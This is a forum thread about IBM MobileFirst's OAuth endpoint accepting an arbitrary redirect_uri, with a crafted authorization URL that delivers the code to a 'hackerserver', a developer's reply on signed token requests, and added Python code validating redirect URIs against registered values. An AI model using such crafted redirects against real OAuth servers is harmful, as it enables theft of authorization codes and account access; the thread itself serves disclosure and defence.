
I log into the application via a security check (UserAuthSecurityCheck).

I frame a URL for the authorization endpoint and change the redirect_uri to a different server (hacker server).

http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=UserAuthSecurityCheck&redirect_uri=http://hackerserver:port/context/getdata

When I make this request, it delivers the authorization code to the hacker server: http://hackerserver:port/context/getdata?code=authorization_code

Now I am able to access this authorization_code on the hacker server.

I believe a hacker can take advantage of this: he makes you click a link in a different browser tab and is able to execute the request to the authorization endpoint.

Why is no whitelisting done in the framework for "redirect_uri"?

How to mitigate this issue?

Open redirects must be avoided as per the OAuth specification:
https://www.rfc-editor.org/rfc/rfc6749#section-10.15

Vignesh Sn
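
As an added example (not code from the question, nor from MobileFirst), here is the redirect_uri handling the question asks about: an authorization endpoint that only redirects to a URI pre-registered for the client, compared by exact string match as RFC 6749 sections 3.1.2.2 and 10.15 require, and which refuses to redirect at all when the URI is not registered. It goes one step beyond the question by also showing a token endpoint that binds each code to the client_id and redirect_uri it was issued for, which is the extra check the answer's signed token request is standing in for. Client id and hostnames follow the question; the port numbers, client registry and in-memory code store are assumptions.

```python
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed client registry: each client_id maps to the redirect URIs it
# registered out of band. Hostnames follow the question; the port is made up.
REGISTERED_CLIENTS = {
    "CLIENT_ID": {"http://mobilefirstserver:9080/context/getdata"},
}
# Constructed in-memory store of issued codes, each bound to the client and
# redirect_uri of the authorization request that produced it.
ISSUED_CODES = {}


def redirect_uri_allowed(client_id, redirect_uri):
    """RFC 6749 s3.1.2.2 / s10.15: exact string comparison with a registered
    value; no prefix match, no host-only match, no normalisation. A fragment
    component is forbidden outright (s3.1.2). redirect_uri is required here."""
    if not redirect_uri or urlsplit(redirect_uri).fragment:
        return False
    return redirect_uri in REGISTERED_CLIENTS.get(client_id, set())


def authorize(query):
    """Authorization endpoint. Returns {'redirect': url} carrying the code, or
    {'error': ...} that must be shown to the user WITHOUT redirecting when the
    client or redirect_uri is invalid (RFC 6749 s4.1.2.1)."""
    p = {k: v[0] for k, v in parse_qs(query).items()}
    client_id, redirect_uri = p.get("client_id"), p.get("redirect_uri")
    if client_id not in REGISTERED_CLIENTS or not redirect_uri_allowed(client_id, redirect_uri):
        return {"error": "invalid_request", "detail": "unregistered redirect_uri"}
    if p.get("response_type") != "code":
        # redirect_uri is known-good, so other errors may be delivered to it.
        return {"redirect": redirect_uri + "?" + urlencode({"error": "unsupported_response_type"})}
    code = secrets.token_urlsafe(32)
    ISSUED_CODES[code] = {"client_id": client_id, "redirect_uri": redirect_uri}
    return {"redirect": redirect_uri + "?" + urlencode({"code": code})}


def exchange_code(client_id, code, redirect_uri):
    """Token endpoint: the code is single-use and must be presented by the same
    client with the same redirect_uri as the original request (s4.1.3)."""
    bound = ISSUED_CODES.pop(code, None)  # pop: a replayed code fails as well
    if bound is None or bound["client_id"] != client_id or bound["redirect_uri"] != redirect_uri:
        return None
    return {"access_token": secrets.token_urlsafe(32), "token_type": "Bearer"}
```

With this check in place the request from the question, whose redirect_uri points at hackerserver, gets an error page and no code is minted; a code that does leak can still not be exchanged by a different client or with a different redirect_uri.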

1 Answer


You are right that we are not whitelisting the redirect_uri. However, the MobileFirst Server mitigates this vulnerability by forcing the token request (which uses the authorization code) to be signed, thus making the attack invalid.

Disclaimer: I'm a developer in the IBM MobileFirst Foundation team.

Idan Adar
idohu
  • Thanks for answering. But I still see a problem with this approach. I am able to change the "redirect_uri" and send the Authorization Code to a different server. If I get hold of the Authorization Code on a different server, I am able to hit the token endpoint using this Authorization Code to get an Access Token. So it doesn't matter if the Authorization Code is signed or unsigned, because the MF server is the one which is providing the Authorization Code. – Vignesh Sn Jan 03 '17 at 07:28
  • The client needs to sign the code with its private key, and that is validated in the server before issuing the token, so the authorization code alone will not be useful. – idohu Jan 03 '17 at 12:24